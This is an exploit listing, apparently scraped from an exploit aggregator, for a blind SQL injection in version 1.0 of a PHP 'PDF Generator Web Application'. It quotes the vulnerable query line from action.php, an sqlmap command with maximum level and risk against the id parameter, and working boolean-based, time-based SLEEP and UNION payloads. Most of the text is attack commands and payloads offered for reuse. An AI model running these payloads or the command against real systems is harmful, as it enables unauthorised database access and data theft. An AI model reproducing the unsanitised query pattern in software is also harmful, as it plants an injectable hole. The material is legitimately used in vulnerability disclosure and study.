Exploit for PDF Generator Web Application 1.0 SQL Injection

Name: Exploit for PDF Generator Web Application 1.0 SQL Injection
Rating: 5 (147 reviews)

2022-03-28 | CVSS 0.3

## https://sploitus.com/exploit?id=PACKETSTORM:166480
# Exploit Title: PDF Generator Web Application - 'multiple' Blind SQL Injection  
# Date: 26/03/2022  
# Exploit Author: Saud Alenazi  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/15243/pdf-generator-web-app-using-tcpdf-and-phpoop-free-source-code.html  
# Version: 1.0  
# Tested on: XAMPP, Linux  
# Contact: https://twitter.com/dmaral3noz  
  
  
# Vulnerable Code  
  
line 23 in file "/pdf_generator/action.php"  
  
$check = $this->conn->query("SELECT * FROM `file_list` where `name` = '{$name}' ".(!empty($id) ? " and id != '{$id}' " : '')." ")->num_rows;  
  
# Sqlmap command:  
  
sqlmap -u 'http://localhost/pdf_generator/?page=manage_file&id=1' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch  
  
# Output:  
  
Parameter: id (GET)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)  
Payload: page=manage_file&id=1' OR NOT 3770=3770-- axnO  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: page=manage_file&id=1' AND (SELECT 3918 FROM (SELECT(SLEEP(5)))yLgc)-- fCtI  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 8 columns  
Payload: page=manage_file&id=1' UNION ALL SELECT CONCAT(0x71707a6a71,0x436a57436257674a6f4264524d524c4c4c6755634145724d4f545270794d7376774c44444c4d4545,0x717a767a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -